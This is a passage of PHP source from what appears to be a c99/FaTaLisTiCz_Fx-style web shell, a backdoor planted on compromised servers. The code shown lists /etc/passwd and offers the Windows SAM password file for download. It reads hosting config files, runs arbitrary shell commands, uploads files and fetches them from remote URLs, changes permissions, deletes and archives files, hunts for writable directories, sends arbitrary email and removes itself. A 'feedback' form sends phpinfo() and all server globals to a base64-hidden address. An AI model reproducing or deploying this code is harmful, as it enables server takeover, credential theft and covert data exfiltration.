1167 <input type="submit" value="View">
1168 </form><br>
1169<?php
1170 $i = $nixpwd_s;
1171 while ($i < $nixpwd_e) {
1172 $uid = posix_getpwuid($i);
1173 if ($uid) {
1174 $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1175 echo "\t\t".join(":",$uid)."<br>\n";
1176 }
1177 $i++;
1178 }
1179 }
1180 else { echo "\t<a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b>View /etc/passwd</b></a>\n"; }
1181 }
1182 else {
1183 $v = $_SERVER["WINDIR"].'\repair\sam';
1184 if (file_get_contents($v)) {
1185 echo "\t<a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><b>Download password file</b></a>\n";
1186 }
1187 }
1188?>
1189 </td></tr>
1190 <tr><td>Config Files</td><td>
1191<?php
1192 if (!is_windows()) {
1193 $v = array(
1194 array("User Domains","/etc/userdomains"),
1195 array("Cpanel Config","/var/cpanel/accounting.log"),
1196 array("Apache Config","/usr/local/apache/conf/httpd.conf"),
1197 array("Apache Config","/etc/httpd.conf"),
1198 array("Syslog Config","/etc/syslog.conf"),
1199 array("Message of The Day","/etc/motd"),
1200 array("Hosts","/etc/hosts")
1201 );
1202 $sep = "/";
1203 }
1204 else {
1205 $windir = $_SERVER["WINDIR"];
1206 $etcdir = $windir.'\system32\drivers\etc\\';
1207 $v = array(
1208 array("Hosts",$etcdir."hosts"),
1209 array("Local Network Map",$etcdir."networks"),
1210 array("LM Hosts",$etcdir."lmhosts.sam"),
1211 );
1212 $sep = "\\";
1213 }
1214 foreach ($v as $sec_arr) {
1215 $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
1216 $sec_d = rtrim($sec_arr[1],$sec_f);
1217 $sec_full = $sec_d.$sec_f;
1218 $sec_d = rtrim($sec_d,$sep);
1219 if (file_get_contents($sec_full)) {
1220 echo "\t[ <a href=\"".$surl."act=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><b>".$sec_arr[0]."</b></a> ]\n";
1221 }
1222 }
1223?>
1224 </td></tr>
1225<?php
1226 function dispsecinfo($name,$value) {
1227 if (!empty($value)) {
1228 echo "\t<tr><td>".$name."</td><td>\n".
1229 "<pre>".wordwrap($value,100)."</pre>\n".
1230 "\t</td></tr>\n";
1231 }
1232 }
1233
1234 if (!is_windows()) {
1235 dispsecinfo("OS Version",fx29exec("cat /proc/version"));
1236 dispsecinfo("Kernel Version",fx29exec("sysctl -a | grep version"));
1237 dispsecinfo("Distrib Name",fx29exec("cat /etc/issue.net"));
1238 dispsecinfo("Distrib Name (2)",fx29exec("cat /etc/*-realise"));
1239 dispsecinfo("CPU Info",fx29exec("cat /proc/cpuinfo"));
1240 dispsecinfo("RAM",fx29exec("free -m"));
1241 dispsecinfo("HDD Space",fx29exec("df -h"));
1242 dispsecinfo("List of Attributes",fx29exec("lsattr -a"));
1243 dispsecinfo("Mount Options",fx29exec("cat /etc/fstab"));
1244 dispsecinfo("lynx installed?",fx29exec("which lynx"));
1245 dispsecinfo("links installed?",fx29exec("which links"));
1246 dispsecinfo("GET installed?",fx29exec("which GET"));
1247 dispsecinfo("Where is Apache?",fx29exec("whereis apache"));
1248 dispsecinfo("Where is perl?",fx29exec("whereis perl"));
1249 dispsecinfo("Locate proftpd.conf",fx29exec("locate proftpd.conf"));
1250 dispsecinfo("Locate httpd.conf",fx29exec("locate httpd.conf"));
1251 dispsecinfo("Locate my.conf",fx29exec("locate my.conf"));
1252 dispsecinfo("Locate psybnc.conf",fx29exec("locate psybnc.conf"));
1253 }
1254 else {
1255 dispsecinfo("OS Version",fx29exec("ver"));
1256 dispsecinfo("Account Settings",fx29exec("net accounts"));
1257 dispsecinfo("User Accounts",fx29exec("net user"));
1258 }
1259 echo "</table>\n";
1260 }
1261
1262 ##[ MAKE FILE ]##
1263 if ($act == "mkfile") {
1264 if ($mkfile != $d) {
1265 if ($overwrite == 0) {
1266 if (file_exists($mkfile)) { echo "<b>FILE EXIST:</b> $overwrite ".htmlspecialchars($mkfile); }
1267 }
1268 else {
1269 if (!fopen($mkfile,"w")) { echo "<b>ACCESS DENIED:</b> ".htmlspecialchars($mkfile); }
1270 else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {
1271 $d .= DIRECTORY_SEPARATOR;
1272 }
1273 $f = basename($mkfile);
1274 }
1275 }
1276 }
1277 else { disp_error("Enter filename!"); }
1278 }
1279
1280 ##[ ENCODER ]##
1281 if ($act == "encoder") {
1282 if (!isset($encoder_input)) { $encoder_input = ""; }
1283?>
1284<script language="javascript"> function set_encoder_input(text) { document.forms.encoder.input.value = text; }</script>
1285
1286<form name="encoder" action="<?php echo $surl; ?>" method=POST>
1287 <input type="hidden" name="act" value="encoder">
1288 <table class="contents">
1289 <tr><td colspan="4" class="barheader">.: Encoder :.</td></tr>
1290 <tr><td colspan="2">Input:</td><td><textarea name="encoder_input" id="input" cols="70" rows="5"><?php echo @htmlspecialchars($encoder_input); ?></textarea><br>
1291 <input type="submit" value="Calculate">
1292 </td></tr>
1293 <tr><td rowspan="4">Hashes:</td>
1294<?php
1295 foreach(array("md5","crypt","sha1","crc32") as $v) {
1296?>
1297 <td><?php echo $v; ?>:</td><td><input type="text" size="50" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo $v($encoder_input); ?>" readonly>
1298 </td></tr>
1299 <tr>
1300<?php
1301 }
1302?>
1303 </tr>
1304 <tr><td rowspan=2>Url:</td>
1305 <td>urlencode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo urlencode($encoder_input); ?>" readonly>
1306 </td></tr>
1307 <tr><td>urldecode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo htmlspecialchars(urldecode($encoder_input)); ?>" readonly>
1308 </td></tr>
1309 <tr><td rowspan=2>Base64:</td>
1310 <td>base64_encode:</td><td><input type="text" size="35" onFocus="this.select()" onMouseover="this.select()" onMouseout="this.select()" value="<?php echo base64_encode($encoder_input); ?>" readonly>
1311 </td></tr>
1312 <tr><td>base64_decode:</td>
1313 <td>
1314<?php
1315 if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {
1316?>
1317 <input type="text" size="35" value="Failed!" disabled readonly>
1318<?php
1319 }
1320 else {
1321 $debase64 = base64_decode($encoder_input);
1322 $debase64 = str_replace("\0","[0]",$debase64);
1323 $a = explode("\r\n",$debase64);
1324 $rows = count($a);
1325 $debase64 = htmlspecialchars($debase64);
1326 if ($rows == 1) {
1327 echo "\t\t<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";
1328 }
1329 else {
1330 $rows++;
1331 echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";
1332 }
1333 echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\">[Send to input]</a>\n";
1334 }
1335 echo "\t\t</td></tr>\n".
1336 "\t\t<tr><td>Base convertations:</td><td>dec2hex</td><td>".
1337 "<input type=\"text\" size=\"35\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"\"";
1338 $c = strlen($encoder_input);
1339 for ($i=0;$i<$c;$i++) {
1340 $hex = dechex(ord($encoder_input[$i]));
1341 if ($encoder_input[$i] == "&") { echo $encoder_input[$i]; }
1342 elseif ($encoder_input[$i] != "\\") { echo "%".$hex; }
1343 }
1344 echo "\" readonly>\n";
1345?>
1346 </td></tr>
1347 </table>
1348</form>
1349<?php
1350 }
1351
1352 ##[ FILESYSTEM BUFFER ]##
1353 if ($act == "fsbuff") {
1354 $arr_copy = $sess_data["copy"];
1355 $arr_cut = $sess_data["cut"];
1356 $arr = array_merge($arr_copy,$arr_cut);
1357 if (count($arr) == 0) {echo "<h2><center>Buffer is empty!</center></h2>";}
1358 else {
1359 $fx_infohead = "File-System Buffer";
1360 $ls_arr = $arr;
1361 $disp_fullpath = TRUE;
1362 $act = "ls";
1363 }
1364 }
1365
1366 ##[ SELF REMOVE ]##
1367 if ($act == "selfremove") {
1368?>
1369<div class="barheader">
1370 .: SELF KILL :.
1371 <hr size="1" noshade>
1372
1373<?php
1374 if ((@$submit == @$rndcode) && (@$submit != "")) {
1375 if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".sh_name()."!"; fx29shexit(); }
1376 else { disp_error("Can't delete ".__FILE__."!"); }
1377 }
1378 else {
1379 if (!empty($rndcode)) { disp_error("Error: Incorrect confirmation code!"); }
1380 $rnd = rand(0,9).rand(0,9).rand(0,9);
1381?>
1382<form name="f_killshell" action="<?php echo $surl; ?>">
1383 <input type="hidden" name="act" value="selfremove">
1384 <input type="hidden" name="rndcode" value="<?php echo $rnd; ?>">
1385 Are you sure want to remove this shell ?<br>
1386 <?php disp_error(__FILE__); ?>
1387 <br>For confirmation, enter "<?php echo $rnd; ?>"<br>
1388 <input type="text" name="submit"><br>
1389 <input type="submit" value="KILL">
1390</form>
1391</div>
1392<?php
1393 }
1394 }
1395
1396 ##[ FEEDBACK ]##
1397 if ($act == "feedback") {
1398 $suppmail = base64_decode("c2gzbGwuY3Jld0Bnb29nbGVtYWlsLmNvbQ==");
1399 if (!empty($submit)) {
1400 $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
1401 $body = sh_name()." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
1402 if (!empty($fdbk_ref)) {
1403 $tmp = @ob_get_contents();
1404 ob_clean();
1405 phpinfo();
1406 $phpinfo = base64_encode(ob_get_contents());
1407 ob_clean();
1408 echo $tmp;
1409 $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
1410 }
1411 mail($suppmail,sh_name()." feedback #".$ticket,$body,"FROM: ".$suppmail);
1412 echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
1413 }
1414 else {
1415?>
1416<div class="barheader">.: Feedback or report bug (<?php echo str_replace(array("@","."),array("[at]","[dot]"),$suppmail); ?>) :.</div>
1417
1418<form name="f_feedback" action="<?php echo $surl; ?>" method="POST">
1419 <input type="hidden" name="act" value="feedback">
1420 <table class="contents">
1421 <tr><th>Your name:</th><td><input type="text" name="fdbk_name" value="<?php echo htmlspecialchars(@$fdbk_name); ?>"></td</tr>
1422 <tr><th>Your e-mail:</th><td><input type="text" name="fdbk_email" value="<?php echo htmlspecialchars(@$fdbk_email); ?>"></td></tr>
1423 <tr><th>Message:</th><td><textarea name="fdbk_body" cols=80 rows=10><?php echo htmlspecialchars(@$fdbk_body); ?></textarea>
1424 <input type="hidden" name="fdbk_ref" value="<?php echo urlencode($HTTP_REFERER); ?>"><br>
1425 <input type="checkbox" name="fdbk_servinf" value="1" checked> Attach Server info (Recommended for bug-fix)</td></tr>
1426 <tr><td></td><td><input type="submit" name="submit" value="Send"></td></tr>
1427 </table>
1428</form>
1429<?php
1430 }
1431 }
1432
1433 ##[ PHP MAILER (By FaTaLisTiCz_Fx) ]##
1434 if ($act == "fxmailer") {
1435?>
1436 <div class="barheader">.: Mailer :.</div>
1437<?php
1438 if (!empty($submit)){
1439 $headers = 'To: '.$dest_email."\n";
1440 $headers .= 'From: '.$sender_name.' '.$sender_email."\n";
1441 if (mail($dest_email,$sender_subj,$sender_body,$headers)) {
1442 echo "<center><b>Email sent to $dest_email!</b></center>";
1443 }
1444 else { disp_error("Can't send email!"); }
1445 }
1446 else {
1447 ?>
1448<form name="f_mailer" action="<?php echo $surl; ?>" method="POST">
1449 <input type="hidden" name="act" value="fxmailer">
1450 <table class="contents">
1451 <tr><th>Your name:</th><td><input type="text" name="sender_name" value="<?php echo @htmlspecialchars($sender_name); ?>"></td></tr>
1452 <tr><th>Your e-mail:</th><td><input type="text" name="sender_email" value="<?php echo @htmlspecialchars($sender_email); ?>"></td></tr>
1453 <tr><th>To:</th><td><input type="text" name="dest_email" value="<?php @htmlspecialchars($dest_email); ?>"></td></tr>
1454 <tr><th>Subject:</th><td><input size="70" type="text" name="sender_subj" value="<?php echo @htmlspecialchars($sender_subj); ?>"></td></tr>
1455 <tr><th>Message:</th><td><textarea name="sender_body" cols="80" rows="10"><?php echo @htmlspecialchars($sender_body); ?></textarea></td></tr>
1456 <tr><th></th><td><input type="submit" name="submit" value="Send"></td></tr>
1457 </table>
1458</form>
1459<?php
1460 }
1461 }
1462
1463 ##[ SEARCH ]##
1464 if ($act == "search") {
1465?>
1466<div class=barheader>.: Filesystem Search :.</div>
1467
1468<?php
1469 if (empty($search_in)) {$search_in = $d;}
1470 if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
1471 if (empty($search_text_wwo)) {$search_text_regexp = 0;}
1472 if (!empty($submit)) {
1473 $found = array();
1474 $found_d = 0;
1475 $found_f = 0;
1476 $search_i_f = 0;
1477 $search_i_d = 0;
1478 $a = array(
1479 "name" => @$search_name,
1480 "name_regexp" => @$search_name_regexp,
1481 "text" => @$search_text,
1482 "text_regexp" => @$search_text_regxp,
1483 "text_wwo" => @$search_text_wwo,
1484 "text_cs" => @$search_text_cs,
1485 "text_not" => @$search_text_not
1486 );
1487 $searchtime = getmicrotime();
1488 $in = array_unique(explode(";",$search_in));
1489 foreach($in as $v) { fx29fsearch($v); }
1490 $searchtime = round(getmicrotime()-$searchtime,4);
1491 if (count($found) == 0) { echo "No files found!"; }
1492 else {
1493 $ls_arr = $found;
1494 $disp_fullpath = TRUE;
1495 $act = "ls";
1496 }
1497 }
1498?>
1499<form name="f_search" method="POST">
1500 <input type="hidden" name="d" value="<?php echo $dispd; ?>">
1501 <input type="hidden" name="act" value="<?php echo $dspact; ?>">
1502 <table class="contents">
1503 <tr><th>File or folder Name:</th><td><input type="text" name="search_name" size="<?php echo round(strlen($search_name)+25); ?>" value="<?php echo htmlspecialchars($search_name); ?>"> <input type="checkbox" name="search_name_regexp" value="1" <?php echo (@$search_name_regexp == 1?" checked":""); ?>> Regular Expression</td></tr>
1504 <tr><th>Look in (Separate by ";"):</th><td><input type="text" name="search_in" size="<?php echo round(strlen($search_in)+25); ?>" value="<?php echo htmlspecialchars($search_in); ?>"></td></tr>
1505 <tr><th>A word or phrase in the file:</th><td><textarea name="search_text" cols="50" rows="5"><?php echo htmlspecialchars(@$search_text); ?></textarea></td></tr>
1506 <tr><th></th><td>
1507 <input type="checkbox" name="search_text_regexp" value="1" <?php echo (@$search_text_regexp == 1?" checked":""); ?>> Regular Expression
1508 <input type="checkbox" name="search_text_wwo" value="1" <?php echo (@$search_text_wwo == 1?" checked":""); ?>> Whole words only
1509 <input type="checkbox" name="search_text_cs" value="1" <?php echo (@$search_text_cs == 1?" checked":""); ?>> Case sensitive
1510 <input type="checkbox" name="search_text_not" value="1" <?php echo (@$search_text_not == 1?" checked":""); ?>> Find files NOT containing the text
1511 </td></tr>
1512 <tr><th></th><td><input type="submit" name="submit" value="Search"></td></tr>
1513 </table>
1514</form>
1515<?php
1516 if ($act == "ls") {
1517 $dspact = $act;
1518 echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b>\n".
1519 "<hr size=\"1\" noshade>\n";
1520 }
1521 }
1522
1523 ##[ CHMOD]##
1524 if ($act == "chmod") {
1525 $mode = fileperms($d.$f);
1526 if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
1527 else {
1528 $form = TRUE;
1529 if ($chmod_submit) {
1530 $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
1531 if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; }
1532 else {$err = "Can't chmod to ".$octet.".";}
1533 }
1534 if ($form) {
1535 $perms = parse_perms($mode);
1536 echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b>\n".
1537 "<br>".($err?"<b>Error:</b> ".$err:"")."\n".
1538 "<form name=\"f_chmod\" action=\"".$surl."\" method=POST>\n".
1539 "<input type=hidden name=d value=\"".htmlspecialchars($d)."\">\n".
1540 "<input type=hidden name=f value=\"".htmlspecialchars($f)."\">\n".
1541 "<input type=hidden name=act value=chmod>\n".
1542 "<table><tr>\n".
1543 "<td><b>Owner</b><br><br>\n".
1544 "<input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br>\n".
1545 "<input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br>\n".
1546 "<input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"")."> eXecute</td>\n".
1547 "<td><b>Group</b><br><br>\n".
1548 "<input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br>\n".
1549 "<input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br>\n".
1550 "<input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"")."> eXecute</td>\n".
1551 "<td><b>World</b><br><br>\n".
1552 "<input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br>\n".
1553 "<input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br>\n".
1554 "<input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"")."> eXecute</td>\n".
1555 "</tr>\n".
1556 "<tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr>\n".
1557 "</table>\n".
1558 "</form>\n";
1559 }
1560 }
1561 }
1562
1563 ##[ UPLOAD ]##
1564 if ($act == "upload") {
1565 $uploadmess = "";
1566 $uploadpath = (isset($uploadpath)) ? str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath) : $d;
1567 if (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) { $uploadpath .= DIRECTORY_SEPARATOR; }
1568 if (!empty($submit)) {
1569 $uploadfile = $_FILES["uploadfile"];
1570 if (!empty($uploadfile["tmp_name"])) {
1571 if (empty($uploadfilename)) { $destin = $uploadfile["name"]; }
1572 else { $destin = $userfilename; }
1573 if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
1574 $uploadmess .= "<div class=errmsg>Error uploading file ".$uploadfile["name"]." (Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!</div>";
1575 }
1576 else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
1577 }
1578 else { $uploadmess .= "<div class=errmsg>No file to upload!</div>"; }
1579 }
1580 echo $uploadmess;
1581 $act = "ls";
1582 }
1583
1584 ##{ DELETE }##
1585 if ($act == "delete") {
1586 $delerr = "";
1587 foreach ($actbox as $v) {
1588 $result = FALSE;
1589 $result = fs_rmobj($v);
1590 if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."<br>"; }
1591 }
1592 if (!empty($delerr)) { disp_error("Error deleting:<br>$delerr"); }
1593 $act = "ls";
1594 }
1595
1596 ##[ COPY ]##
1597 if ($act == "copy") {
1598 $err = "";
1599 $sess_data["copy"] = array_merge($sess_data["copy"],$actbox);
1600 fx29_sess_put($sess_data);
1601 $act = "ls";
1602 }
1603
1604 ##[ CUT ]##
1605 elseif ($act == "cut") {
1606 $sess_data["cut"] = array_merge($sess_data["cut"],$actbox);
1607 fx29_sess_put($sess_data);
1608 $act = "ls";
1609 }
1610
1611 ##[ UNSELECT ]##
1612 elseif ($act == "unselect") {
1613 foreach ($sess_data["copy"] as $k=>$v) {
1614 if (in_array($v,$actbox)) { unset($sess_data["copy"][$k]); }
1615 }
1616 foreach ($sess_data["cut"] as $k=>$v) {
1617 if (in_array($v,$actbox)) { unset($sess_data["cut"][$k]); }
1618 }
1619 fx29_sess_put($sess_data);
1620 $act = "ls";
1621 }
1622
1623 ##[ EMPTY BUFFER ]##
1624 if (@$actemptybuff) { $sess_data["copy"] = $sess_data["cut"] = array(); fx29_sess_put($sess_data); }
1625
1626 ##[ PASTE BUFFER ]##
1627 elseif (@$actpastebuff) {
1628 $psterr = "";
1629 foreach($sess_data["copy"] as $k=>$v) {
1630 $to = $d.basename($v);
1631 if (!fs_copy_obj($v,$to)) { $psterr .= "Can't copy ".$v." to ".$to."!<br>"; }
1632 if ($copy_unset) { unset($sess_data["copy"][$k]); }
1633 }
1634 foreach($sess_data["cut"] as $k=>$v) {
1635 $to = $d.basename($v);
1636 if (!fs_move_obj($v,$to)) { $psterr .= "Can't move ".$v." to ".$to."!<br>"; }
1637 unset($sess_data["cut"][$k]);
1638 }
1639 fx29_sess_put($sess_data);
1640 if (!empty($psterr)) { disp_error("Pasting with errors:<br>$psterr"); }
1641 $act = "ls";
1642 }
1643
1644 ##[ ARCHIVE BUFFER ]##
1645 elseif (@$actarcbuff) {
1646 $arcerr = "";
1647 if (substr($actarcbuff_path,-7,7) == ".tar.gz") { $ext = ".tar.gz"; }
1648 else { $ext = ".tar.gz"; }
1649 if ($ext == ".tar.gz") { $cmdline = "tar cfzv"; }
1650 $cmdline .= " ".$actarcbuff_path;
1651 $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
1652 foreach($objects as $v) {
1653 $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
1654 if (substr($v,0,strlen($d)) == $d) { $v = basename($v); }
1655 if (is_dir($v)) {
1656 if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
1657 $v .= "*";
1658 }
1659 $cmdline .= " ".$v;
1660 }
1661 $tmp = realpath(".");
1662 chdir($d);
1663 $ret = fx29exec($cmdline);
1664 chdir($tmp);
1665 if (empty($ret)) { $arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>"; }
1666 $ret = str_replace("\r\n","\n",$ret);
1667 $ret = explode("\n",$ret);
1668 if ($copy_unset) { foreach($sess_data["copy"] as $k=>$v) { unset($sess_data["copy"][$k]); } }
1669 foreach($sess_data["cut"] as $k=>$v) {
1670 if (in_array($v,$ret)) { fs_rmobj($v); }
1671 unset($sess_data["cut"][$k]);
1672 }
1673 fx29_sess_put($sess_data);
1674 if (!empty($arcerr)) { disp_error("Archivation errors:<br>$arcerr"); }
1675 $act = "ls";
1676 }
1677 ##[ CMD ]##
1678 if ($act == "cmd") {
1679 @chdir($chdir);
1680 if (!empty($submit)) {
1681 echo "<div class=barheader>.: Command Output :.</div>\n";
1682 $olddir = realpath(".");
1683 @chdir($d);
1684 $ret = fx29exec($cmd);
1685 $ret = convert_cyr_string($ret,"d","w");
1686 if ($cmd_txt) {
1687 $rows = count(explode("\n",$ret))+1;
1688 if ($rows < 10) { $rows = 10; } else { $rows = 30; }
1689 $cols = 125;
1690 echo "<textarea class=\"shell\" cols=\"$cols\" rows=\"$rows\" readonly>".htmlspecialchars($ret)."</textarea>\n";
1691 }
1692 else { echo $ret."<br>"; }
1693 @chdir($olddir);
1694 }
1695 }
1696 ##[ PHP FILESYSTEM (By FaTaLisTiCz_Fx) ]##
1697 if ($act == "phpfsys") {
1698 echo "<div align=left>";
1699 $fsfunc = $phpfsysfunc;
1700 if ($fsfunc=="copy") {
1701 if (!copy($arg1, $arg2)) { echo "Failed to copy $arg1...\n";}
1702 else { echo "<b>Success!</b> $arg1 copied to $arg2\n"; }
1703 }
1704 elseif ($fsfunc=="rename") {
1705 if (!rename($arg1, $arg2)) { echo "Failed to rename/move $arg1!\n";}
1706 else { echo "<b>Success!</b> $arg1 renamed/moved to $arg2\n"; }
1707 }
1708 elseif ($fsfunc=="chmod") {
1709 if (!chmod($arg1,$arg2)) { echo "Failed to chmod $arg1!\n";}
1710 else { echo "<b>Perm for $arg1 changed to $arg2!</b>\n"; }
1711 }
1712 elseif ($fsfunc=="read") {
1713 $darg = $d.$arg1;
1714 if ($hasil = @file_get_contents($darg)) {
1715 echo "<b>Filename:</b> ".$darg."<br>";
1716 echo "<center><textarea cols=125 rows=30>";
1717 echo htmlentities($hasil);
1718 echo "</textarea></center>\n";
1719 }
1720 else { disp_error("Couldn't open $darg"); }
1721 }
1722 elseif ($fsfunc=="write") {
1723 $darg = $d.$arg1;
1724 if(@file_put_contents($darg,$arg2)) {
1725 echo "<b>Saved!</b> ".$darg;
1726 }
1727 else { disp_error("Can't write to $darg!"); }
1728 }
1729 elseif ($fsfunc=="downloadbin") {
1730 $handle = fopen($arg1, "rb");
1731 $contents = '';
1732 while (!feof($handle)) {
1733 $contents .= fread($handle, 8192);
1734 }
1735 $r = @fopen($d.$arg2,'w');
1736 if (fwrite($r,$contents)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
1737 else { disp_error("Can't write to ".$d.$arg2."!"); }
1738 fclose($r);
1739 fclose($handle);
1740 }
1741 elseif ($fsfunc=="download") {
1742 $text = implode('', file($arg1));
1743 if ($text) {
1744 $r = @fopen($d.$arg2,'w');
1745 if (fwrite($r,$text)) { echo "<b>Success!</b> $arg1 saved to ".$d.$arg2." (".view_size(filesize($d.$arg2)).")"; }
1746 else { disp_error("Can't write to ".$d.$arg2."!"); }
1747 fclose($r);
1748 }
1749 else { disp_error("Can't download from $arg1!");}
1750 }
1751 elseif ($fsfunc=='mkdir') {
1752 $thedir = $d.$arg1;
1753 if ($thedir != $d) {
1754 if (file_exists($thedir)) { echo "<b>Already exists:</b> ".htmlspecialchars($thedir); }
1755 elseif (!mkdir($thedir)) { echo "<b>Access denied:</b> ".htmlspecialchars($thedir); }
1756 else { echo "<b>Dir created:</b> ".htmlspecialchars($thedir);}
1757 }
1758 else { echo "Can't create current dir:<b> $thedir</b>"; }
1759 }
1760 elseif ($fsfunc=='fwritabledir') {
1761 function recurse_dir($dir,$max_dir) {
1762 global $dir_count;
1763 $dir_count++;
1764 if( $cdir = dir($dir) ) {
1765 while( $entry = $cdir-> read() ) {
1766 if( $entry != '.' && $entry != '..' ) {
1767 if(is_dir($dir.$entry) && is_writable($dir.$entry) ) {
1768 if ($dir_count > $max_dir) { return; }
1769 echo "[".$dir_count."] ".$dir.$entry."\n";
1770 recurse_dir($dir.$entry.DIRECTORY_SEPARATOR,$max_dir);
1771 }
1772 }
1773 }
1774 $cdir->close();
1775 }
1776 }
1777 if (!$arg1) { $arg1 = $d; }
1778 if (!$arg2) { $arg2 = 10; }
1779 if (is_dir($arg1)) {
1780 echo "<b>Writable directories (Max: $arg2) in:</b> $arg1<hr noshade size=1>";
1781 echo "<pre>";
1782 recurse_dir($arg1,$arg2);
1783 echo "</pre>";
1784 $total = $dir_count - 1;
1785 echo "<hr noshade size=1><b>Founds:</b> ".$total." of <b>Max</b> $arg2";
1786 }
1787 else {
1788 disp_error("Directory is not exists or permission denied!");
1789 }
1790 }
1791 else {
1792 if (!$arg1) { disp_error("No operation! Please fill 1st parameter!"); }
1793 else {
1794 if ($hasil = $fsfunc($arg1)) {
1795 echo "<b>Result of $fsfunc $arg1:</b><br>";
1796 if (!is_array($hasil)) { echo "$hasil\n"; }
1797 else {
1798 echo "<pre>";
1799 foreach ($hasil as $v) { echo $v."\n"; }
1800 echo "</pre>";
1801 }
1802 }
1803 else { disp_error("$fsfunc $arg1 failed!"); }
1804 }
1805 }
1806 echo "</div>\n";
1807 }
1808
1809 ##[ DIRECTORY LIST ]##
1810 if ($act == "ls") {
1811 if (count($ls_arr) > 0) { $list = $ls_arr; }
1812 else {
1813 $list = array();
1814 if ($h = @opendir($d)) {
1815 while (($o = readdir($h)) !== FALSE) { $list[] = $d.$o; }
1816 closedir($h);
1817 }
1818 }
1819 if (count($list) == 0) {
1820 disp_error("No such directory or access denied!<br>".htmlspecialchars($d));
1821 }
1822 else {
1823 $objects = array();
1824 $vd = "f"; #Viewing mode
1825 if ($vd == "f") {
1826 $objects["head"] = array();
1827 $objects["folders"] = array();
1828 $objects["links"] = array();
1829 $objects["files"] = array();
1830 foreach ($list as $v) {
1831 $o = basename($v);
1832 $row = array();
1833 if ($o == ".") { $row[] = $d.$o; $row[] = "CURDIR"; }
1834 elseif ($o == "..") { $row[] = $d.$o; $row[] = "DIR"; }
1835 elseif (is_dir($v)) {
1836 if (is_link($v)) { $type = "LINK"; }
1837 else { $type = "DIR"; }
1838 $row[] = $v;
1839 $row[] = $type;
1840 }
1841 elseif(is_file($v)) { $row[] = $v; $row[] = filesize($v); }
1842 $row[] = filemtime($v);
1843 if (!is_windows()) {
1844 $ow = posix_getpwuid(fileowner($v));
1845 $gr = posix_getgrgid(filegroup($v));
1846 $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
1847 }
1848 $row[] = fileperms($v);
1849 if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
1850 elseif (is_link($v)) { $objects["links"][] = $row; }
1851 elseif (is_dir($v)) { $objects["folders"][] = $row; }
1852 elseif (is_file($v)) { $objects["files"][] = $row; }
1853 $i++;
1854 }
1855 $row = array();
1856 $row[] = "<b>Name</b>";
1857 $row[] = "<b>Size</b>";
